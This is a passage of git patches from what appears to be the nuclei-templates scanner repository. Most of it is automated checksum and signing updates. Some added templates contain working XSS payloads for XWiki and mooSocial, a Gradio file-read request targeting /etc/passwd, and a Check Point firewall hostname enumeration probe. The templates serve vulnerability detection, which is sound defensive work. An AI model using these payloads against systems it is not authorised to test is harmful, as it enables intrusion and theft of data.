http/exposed-panels/tikiwiki-cms.yaml:704f538632b5890953ff4ee1550305c9b6f9bcc4 http/exposed-panels/tiny-file-manager.yaml:5227b4eaf964e71cb70ca203584d07e6abfcb4d9 +http/exposed-panels/tiny-rss-panel.yaml:d92cd21d2be017095150d3ad9e298cdb15228015 http/exposed-panels/tixeo-panel.yaml:c4d4bdf1928f96106840072e7921b6914df9b2d1 http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:83eeb31ba321516ebf82f3d494663984d7b9a0bc http/exposed-panels/tooljet-panel.yaml:3769667dde0edf58291e63302ba316456c70b37d @@ -8528,7 +8529,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1b50b4125ef938d3ca75976b6462aab4643af44b +templates-checksum.txt:e8fb0a930b139ff484171995e9e8979774453c60 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e7aa03c4ff50f17c420e4a7e6d185c78b58151b5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:57:47 +0000 Subject: [PATCH 310/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ea22d0de4b..3488c06510 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -20,6 +20,7 @@ on: - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/pocketbase-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' + - 'http/exposed-panels/tiny-rss-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' From eff1584884781540b0efb376d33db023bc4a3a14 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:31:10 +0530 Subject: [PATCH 311/375] Update froxlor-installer.yaml --- http/misconfiguration/installer/froxlor-installer.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml index 4bee3970e4..7c4ba2c638 100644 --- a/http/misconfiguration/installer/froxlor-installer.yaml +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="Froxlor Server Management Panel - Installation" - tags: misconfig,froxlor,installer,setup + tags: misconfig,froxlor,installer http: - method: GET @@ -24,7 +24,7 @@ http: - type: word part: body words: - - "Froxlor Server Management Panel - Installation" + - "Froxlor Server Management Panel - Installation" - type: status status: From 3948f8fc2cbd6300f6c38ff37219a51085dc4526 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:01:34 +0000 Subject: [PATCH 313/375] Auto Generated Templates Checksum [Wed May 15 04:01:34 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b167fe10d0..5298e7cf2a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3278,7 +3278,7 @@ http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc -http/cves/2024/CVE-2024-3097.yaml:774f7a0efb9b68a93dfda3f53418fcb4f23af138 +http/cves/2024/CVE-2024-3097.yaml:4185bbc6b136c6f1674cf35e66d4c4142e75bb0e http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 @@ -3628,7 +3628,7 @@ http/exposed-panels/c2/pupyc2.yaml:276b410dc583d2cfd9742a040bc048997d090548 http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:8ebbc2a86c1513245e2b68fe7d9d31d56645752c http/exposed-panels/c2/supershell-c2.yaml:9533bcc7d91683804c11dd054c172d15241e595d http/exposed-panels/c2/viper-c2.yaml:f708e8061a27834d3811c6ddced04f88548d82cc -http/exposed-panels/cacti-panel.yaml:522433ee64137fb9e5195f26a080b5c0f3b89bc8 +http/exposed-panels/cacti-panel.yaml:2d3c5877d8f9ce9109e4e2652720f9cffb2dc0ae http/exposed-panels/calendarix-panel.yaml:15d8c58acf5ffa87da6baedb078709feff94b176 http/exposed-panels/call-break-cms.yaml:d37a921a0f3dd61db474c8366f58fb02308b0e4f http/exposed-panels/camunda-login-panel.yaml:474070f6901e0b308c48903ded30985dbc033173 @@ -8529,7 +8529,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8fb0a930b139ff484171995e9e8979774453c60 +templates-checksum.txt:e0c54974d4232b38654fb8fd736629697b01379e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3aaced79be9d2fe17b6b560e5970cff8dbb401e5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:03:15 +0000 Subject: [PATCH 314/375] Auto Template Signing [Wed May 15 04:03:15 UTC 2024] :robot: --- http/exposed-panels/cacti-panel.yaml | 2 +- http/exposed-panels/tiny-rss-panel.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 26155bc361..e998a1a95e 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -48,4 +48,4 @@ http: group: 1 regex: - "<div class='versionInfo'>Version (.*) |" -# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b3110f2d77b3f6513cc8f7e915660505f5f1414f89715d1fc1a562bde90075fa02201dcff79552b3f5d1622fc45bda5868f3a4b43b6bc5edf01210dc46a04630f1a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 456deebdd8..8686589488 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -25,3 +25,4 @@ http: - 'status_code==200' - 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' condition: and +# digest: 4a0a00473045022100840ed0e143bb8658c51929c452c2c7f11395d2611929d4b2306fb2c7bdfc881002205726c2e4a715d6d13a7b64305182dd78122a0c4e647bf3e6ed66f815b2d8577b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9335c72919d176754e0019aea2394d2a1bd8b86c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:34:53 +0530 Subject: [PATCH 315/375] Update custom-xoops-installer.yaml --- http/misconfiguration/installer/custom-xoops-installer.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml index 6af3ad2175..7bd4a43d7f 100644 --- a/http/misconfiguration/installer/custom-xoops-installer.yaml +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -1,7 +1,7 @@ id: custom-xoops-installer info: - name: XOOPS Custom Installer - Exposed + name: XOOPS Custom - Installation author: DhiyaneshDK severity: high description: | @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="XOOPS Custom Installation" - tags: misconfig,xoops,installer,setup + tags: misconfig,xoops,installer http: - method: GET From 2952e2d91881e5aceb20d10e3fb749aaf51f98b4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 04:05:22 +0000 Subject: [PATCH 316/375] Auto Generated New Template Addition List [Wed May 15 04:05:22 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 739939780e..78308ea172 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml +http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml From 307edb1c0a6fcaa32d5ecc7f95b4490cd500ff10 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:05:30 +0000 Subject: [PATCH 317/375] Auto Generated Templates Checksum [Wed May 15 04:05:30 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5298e7cf2a..72ba7315c2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3628,7 +3628,7 @@ http/exposed-panels/c2/pupyc2.yaml:276b410dc583d2cfd9742a040bc048997d090548 http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:8ebbc2a86c1513245e2b68fe7d9d31d56645752c http/exposed-panels/c2/supershell-c2.yaml:9533bcc7d91683804c11dd054c172d15241e595d http/exposed-panels/c2/viper-c2.yaml:f708e8061a27834d3811c6ddced04f88548d82cc -http/exposed-panels/cacti-panel.yaml:2d3c5877d8f9ce9109e4e2652720f9cffb2dc0ae +http/exposed-panels/cacti-panel.yaml:d8df896275c8442591f3ee3e3fb969618da78aaf http/exposed-panels/calendarix-panel.yaml:15d8c58acf5ffa87da6baedb078709feff94b176 http/exposed-panels/call-break-cms.yaml:d37a921a0f3dd61db474c8366f58fb02308b0e4f http/exposed-panels/camunda-login-panel.yaml:474070f6901e0b308c48903ded30985dbc033173 @@ -4439,7 +4439,7 @@ http/exposed-panels/tibco-spotfire-panel.yaml:7abc1e8affa4065623831a8dfa9ebcc5f3 http/exposed-panels/tigase-xmpp-server.yaml:75dcbfb91190aa716fb8894a26fad88ebcf1c4b4 http/exposed-panels/tikiwiki-cms.yaml:704f538632b5890953ff4ee1550305c9b6f9bcc4 http/exposed-panels/tiny-file-manager.yaml:5227b4eaf964e71cb70ca203584d07e6abfcb4d9 -http/exposed-panels/tiny-rss-panel.yaml:d92cd21d2be017095150d3ad9e298cdb15228015 +http/exposed-panels/tiny-rss-panel.yaml:de8fb04fcf6c23c02809fccfb37249b02a89aa14 http/exposed-panels/tixeo-panel.yaml:c4d4bdf1928f96106840072e7921b6914df9b2d1 http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:83eeb31ba321516ebf82f3d494663984d7b9a0bc http/exposed-panels/tooljet-panel.yaml:3769667dde0edf58291e63302ba316456c70b37d @@ -5396,6 +5396,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea +http/misconfiguration/installer/froxlor-installer.yaml:e3a2af5a8d7475eef58a8b6a88eb2267ac347d4a http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 @@ -8529,7 +8530,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e0c54974d4232b38654fb8fd736629697b01379e +templates-checksum.txt:2513db0e0348406e05aea64aaaab436dfb52cc4e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e3e3c4b50cc8d00e2b20176c6c5d6f90d15286a9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 04:06:08 +0000 Subject: [PATCH 318/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3488c06510..91076b1cbb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/exposed-panels/tiny-rss-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' + - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' From 5ccf112d057259a8e918956e3e017a9e1174e0f6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:07:07 +0000 Subject: [PATCH 319/375] Auto Template Signing [Wed May 15 04:07:07 UTC 2024] :robot: --- http/misconfiguration/installer/froxlor-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml index 7c4ba2c638..1c93802949 100644 --- a/http/misconfiguration/installer/froxlor-installer.yaml +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ca0ee8716e91d55cf8bc1d912b11d301b57e873b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 04:11:06 +0000 Subject: [PATCH 320/375] Auto Generated New Template Addition List [Wed May 15 04:11:06 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 78308ea172..19bc997a04 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml +http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml From f5143dc78d598e86b2c837708c05f25f9dafe9aa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:11:11 +0000 Subject: [PATCH 321/375] Auto Generated Templates Checksum [Wed May 15 04:11:11 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 72ba7315c2..66c83d9ca8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5385,6 +5385,7 @@ http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a2 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 +http/misconfiguration/installer/custom-xoops-installer.yaml:d616ad8b7ead738c10458cd6cabbf31fa18683dc http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3b7ce26012217d959b http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f @@ -5396,7 +5397,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea -http/misconfiguration/installer/froxlor-installer.yaml:e3a2af5a8d7475eef58a8b6a88eb2267ac347d4a +http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 @@ -8530,7 +8531,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2513db0e0348406e05aea64aaaab436dfb52cc4e +templates-checksum.txt:cbad61704aa4d1d43cde2cb1311c497d8c317993 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b88d865487f23c8443a7a348f494aa970c97a9c3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 04:11:46 +0000 Subject: [PATCH 322/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 91076b1cbb..15a344e683 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/exposed-panels/tiny-rss-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' + - 'http/misconfiguration/installer/custom-xoops-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' From fa4cb2d6744565fe9b02d89a4b64f29b48c4177f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 04:12:57 +0000 Subject: [PATCH 323/375] Auto Template Signing [Wed May 15 04:12:57 UTC 2024] :robot: --- http/misconfiguration/installer/custom-xoops-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml index 7bd4a43d7f..6eaa0776c4 100644 --- a/http/misconfiguration/installer/custom-xoops-installer.yaml +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b574595ed002b9b6b399e1371f8a7943097ad77d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 10:44:26 +0530 Subject: [PATCH 324/375] Create CVE-2023-35158.yaml --- http/cves/2023/CVE-2023-35158.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-35158.yaml diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml new file mode 100644 index 0000000000..002255372b --- /dev/null +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-35158 + +info: + name: XWiki - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. + impact: | + Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser. + remediation: | + Update XWiki to the latest version to mitigate the Reflected XSS vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-35158 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-35158 + cwe-id: CWE-87 + epss-score: 0.00105 + epss-percentile: 0.42103 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: xwiki + product: xwiki + shodan-query: "XWiki" + tags: cve,cve2023,xwiki,xss + +http: + - method: GET + path: + - "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)" + + matchers: + - type: dsl + dsl: + - 'contains(body, "href=\"javascript:alert(document.domain)\">Cancel</a>")' + - 'contains(header, "text/html")' + - 'status_code == 200' + condition: and From 3456d3574ff5c47c0f87351c853c5d4056f9b321 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 10:59:46 +0530 Subject: [PATCH 325/375] Create CVE-2023-44813.yaml --- http/cves/2023/CVE-2023-44813.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2023/CVE-2023-44813.yaml diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml new file mode 100644 index 0000000000..77040b15e1 --- /dev/null +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-44813 + +info: + name: mooSocial v.3.1.8 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function. + impact: | + Successful exploitation could lead to unauthorized access or data theft + remediation: | + Upgrade to a patched version of mooSocial + reference: + - https://github.com/ahrixia/CVE-2023-44813 + - https://nvd.nist.gov/vuln/detail/CVE-2023-44813 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-44813 + cwe-id: CWE-79 + epss-score: 0.00069 + epss-percentile: 0.28937 + cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: moosocial + product: moosocial + shodan-query: http.favicon.hash:702863115 + tags: cve,cve2023,moosocial,xss + +http: + - method: GET + path: + - "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(1)%2f%2f;'" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "initInviteFriendBtn('model');alert(1)//;" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From d0cfa246ab38b2a4021475f5dd814ba3f00dde19 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 15 May 2024 11:45:00 +0530 Subject: [PATCH 326/375] Create checkpoint-firewall-enum.yaml --- .../enumeration/checkpoint-firewall-enum.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 javascript/enumeration/checkpoint-firewall-enum.yaml diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml new file mode 100644 index 0000000000..057dee67e8 --- /dev/null +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -0,0 +1,37 @@ +id: checkpoint-firewall-enum + +info: + name: Check Point Firewall - Enum + author: pussycat0x + severity: info + reference: + - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/checkpoint_hostname.rb + metadata: + verfied: true + shodan-query: product:"Check Point Firewall" + tags: js,network,firewall,checkpoint,enum + +javascript: + - code: | + let packet = bytes.NewBuffer(); + let prob = "\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00" + data = packet.Write(prob) + const c = require("nuclei/net"); + let conn = c.Open('tcp', `${Host}:${Port}`); + conn.Send(data); + let resp = conn.RecvFullString(); + let regex = /CN=(.+),O=(.+?)\./i; + let match = resp.match(regex); + let fw_hostname = match[1]; + let sc_hostname = match[2]; + let result = (`Firewall Host: ${fw_hostname}, SmartCenter Host: ${sc_hostname}`); + result + + args: + Host: "{{Host}}" + Port: 264 + + extractors: + - type: dsl + dsl: + - response From 8ead1e34402d9c8305346210f96727fa15c380ef Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 11:46:08 +0530 Subject: [PATCH 327/375] updated matcher type --- http/cves/2024/CVE-2024-1561.yaml | 25 ++++++++----------------- 1 file changed, 8 insertions(+), 17 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 1fe5e8dc1f..8540dc604a 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -1,7 +1,7 @@ id: CVE-2024-1561 info: - name: Gradio Applications - Unauthorized Local File Read + name: Gradio Applications - Local File Read author: Diablo severity: high description: | @@ -14,7 +14,6 @@ info: - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338 - https://github.com/DiabloHTB/CVE-2024-1561 - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561 - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N @@ -27,7 +26,7 @@ info: verified: true max-request: 3 shodan-query: html:"__gradio_mode__" - tags: cve,cve2024,intrusive,unauth,gradio,lfi + tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr flow: http(1) && http(2) && http(3) @@ -52,10 +51,7 @@ http: Host: {{Hostname}} Content-Type: application/json - {"component_id": "{{first-component}}", - "data": "/etc/passwd", - "fn_name": "move_resource_to_block_cache", - "session_hash": "aaaaaaaaaaa"} + {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"} extractors: - type: regex @@ -69,14 +65,9 @@ http: GET /file={{tmpath}} HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - - type: regex - part: body - regex: - - "root:[x*]:0:0:" - - - type: word - part: header - words: - - "text/plain" + - type: dsl + dsl: + - regex('root:.*:0:0:', body) + - 'contains(header, "text/plain")' + condition: and From a26347219b973ae910b6b6401ff7700dd64de9d9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 